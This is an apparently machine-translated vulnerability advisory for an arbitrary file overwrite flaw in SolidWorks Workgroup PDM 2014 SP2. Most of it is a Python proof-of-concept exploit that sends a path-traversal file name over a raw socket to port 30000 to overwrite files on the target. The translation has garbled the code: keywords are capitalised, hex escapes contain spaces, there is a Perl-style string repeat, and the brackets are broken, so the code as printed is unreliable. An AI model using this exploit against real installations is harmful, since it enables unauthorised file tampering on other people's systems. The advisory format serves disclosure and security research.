SolidWorks Workgroup PDM Arbitrary File Overwrite Vulnerability

Release date:
Updated on:

Affected Systems:
SolidWorks Workgroup PDM 2014 SP2
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65751

SolidWorks Workgroup PDM software helps individuals and small working groups manage projects and control their design versions.

SolidWorks Workgroup PDM 2014 SP2 and other versions have the Arbitrary File Overwrite Vulnerability. Successful exploitation of the vulnerability allows attackers to overwrite arbitrary files in the context of the affected application users.

<* Source: Mohamed Shetta
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/env python

Import socket
Import struct
Import ctypes

FileName = "\ x2E \ x00 \ x2E \ x00 \ x5C \ x00 \ x2E \ x00 \ x2E \ x00 \ x5C \ x00 \ x74 \ x00 \ x65 \ x00 \ x73 \ x00 \ x74 \ x00 "#.. \.. \ test
Data = "A" x 1028
FileSize = len (Data)
FNsz = len (FileName)
OpCode = "\ xD0 \ x07 \ x00 \ x00"
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect ("192.168.0.4", 30000 ))
S. send (OpCode)
S. send (struct. pack ("I", FNsz ))
S. send (FileName)
S. send (struct. pack ('<Q', FileSize ))
S. send (Data)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

SolidWorks
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.solidworks.com.cn/